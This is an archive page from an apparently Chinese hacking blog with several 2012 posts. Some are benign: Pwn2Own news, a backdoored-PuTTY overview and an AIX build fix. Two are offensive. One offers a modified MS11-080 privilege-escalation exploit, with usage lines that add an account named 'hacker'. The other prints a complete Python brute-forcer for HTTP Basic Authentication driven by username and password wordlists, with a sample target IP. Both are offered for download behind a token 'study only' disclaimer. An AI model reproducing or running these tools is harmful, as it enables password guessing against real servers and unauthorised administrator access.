存档

作者存档

安全是相对的-Chrome浏览器最终被黑客攻破

2012年3月8日 2 条评论

         还记得之前Google悬赏百万美元来让大家黑Chrome的消息吗?现在Google真的要乖乖掏这笔钱了。在正在举行的Pwn2Own年度黑客大赛上,Chrome不幸成为了第一个被黑客攻破的浏览器。

        Pwn2Own是CanSecWest在温哥华组织的一年一度的网络系统安全大会,大会上黑客们可以通过系统本身的漏洞破坏系统的安全防护从而完全控制系统。虽然在过去三年的Pwn2Own大会上,Chrome是唯一 一个没有被攻破的浏览器。但这次比赛刚刚开始5分钟,Chrome就被上届第一个攻破Safari浏览器的Vupen黑客团队破解。

阅读全文…

PHP 代码安全审计——程序员容易忽略的安全问题-注入篇

2012年2月20日 9 条评论
作者:不走的钟
        程序员主要考虑功能设计,但往往忽略了程序的安全性,最近在项目中审计PHP代码时,遇到二个简单而很多程序员都容易忽略的问题,安全问题不容小视,往往微小问题便可导致全站覆没,看下边代码:

中文版Putty 后门分析

2012年1月31日 4 条评论

作者:不走的钟

  今天IT行业微博热点 中文Putty多款软件存在后门,有的说被绑马,有后门众说纷纷。简单地说软件后门可以分为二种:

  一、正常软件与木马进行捆绑,当用户运行软件时,木马或者病毒自动运行,用户不知不觉便中了招。

  二、在软件代码中加入了特殊代码,让软件有“特别”的功能,如发送口令到指定服务器,完成木马功能。

阅读全文…

AIX “ld: 0711-317 ERROR: Undefined symbol: .sqrt ”解决方法

2012年1月21日 没有评论

AIX5.3、AIX6.1编译Apache的时候提示如下错误:
ld: 0711-317 ERROR: Undefined symbol: .sqrt
ld: 0711-345 Use the -bloadmap or -bnoquiet option to obtain more information.
collect2: ld returned 8 exit status
make: 1254-004 The error code from the last command is

阅读全文…

MS11080本地提权添加管理员EXP

2012年1月6日 13 条评论

        MS11080漏洞利用程序,源码来自国外,公开的exp是显示一个system权限的shell,不能带参数直接运行,按一个朋友需求改成可自定义cmd内容,使用方法如下:

XP  :   exp.exe XP “net user hacker /add”
2003:  exp.exe 2K3 “net user hacker /add”

非C,所以体积非常大,仅供学习参考!测试示意图如下:

点击下载

目录Authorization破解工具

2011年12月20日 3 条评论

Web目录下有一些文件不允许匿名访问(可以使用Tomcat、Apache、nginx等进行配制,来实现此效果),如下图:

可以使用以下代码+字典破解,运行结果如下:

主要代码如下(附件中有完整代码,仅供学习!请勿非法使用!):

#!/usr/bin/env python
#coding=utf-8
import sys
import os
import httplib2
import base64

def To_Base64(s):
    s=unicode(s)
    s=s.encode("utf-8")
    encoded = base64.b64encode(s)
    return encoded
def From_Base64(s):
    s=unicode(s)
    decoded = base64.b64decode(s)
    decoded=decoded.decode("utf-8")
    return decoded
def httpRequest(method,url,user_pass):
    if method=='get':
       h= httplib2.Http()
       res, content = h.request(url, 'GET',headers={'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:8.0.1) Gecko/20100101 Firefox/8.0.1',
       'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
       'Accept-Language' : 'zh-cn,zh;q=0.5',
       'Accept-Encoding':'gzip, deflate',
       'Accept-Charset':'GB2312,utf-8;q=0.7,*;q=0.7',
       'Proxy-Connection':'keep-alive',
       'Authorization':'Basic '+user_pass})
       startus=res.status
    elif method=='post':
        startus=''
#    print startus
    return startus
################  main  #####################
print '####################################################'
print ' # '+'www.007hack.com'+'  '
print ' # '+'author:admin#007hack.com'+'  '
print ' # '+'Please input a URL'+'  '
print ' # '+'Demo url: http://222.230.17.123'+' '
print ' # '+'Username :user.txt '+'  '
print ' # '+'Password :pass.txt '+'  '
print '#####################################################'

url=raw_input('Please input a url: ')
#url='http://222.230.17.123'

username=open('user.txt','r')
i=0
for username in username.readlines():
    if username!='':
        username="".join(username)
        if username[-1]=='\n':
            username=username[0:-1]
        userpass=open('pass.txt', 'r')
        for userpass in userpass.readlines():
            userpass="".join(userpass)
            if userpass[-1]=='\n':
                userpass=userpass[0:-1]
            user_pass=To_Base64(username+':'+userpass)
            startus=httpRequest('get', str(url), user_pass)
            if startus==200:
                print '####################################################'
                print '                     succeed:'+From_Base64(user_pass)
                print '####################################################'
                exit()
            else:
                i=i+1
                print str(i)+" "+username+':'+userpass

点击下载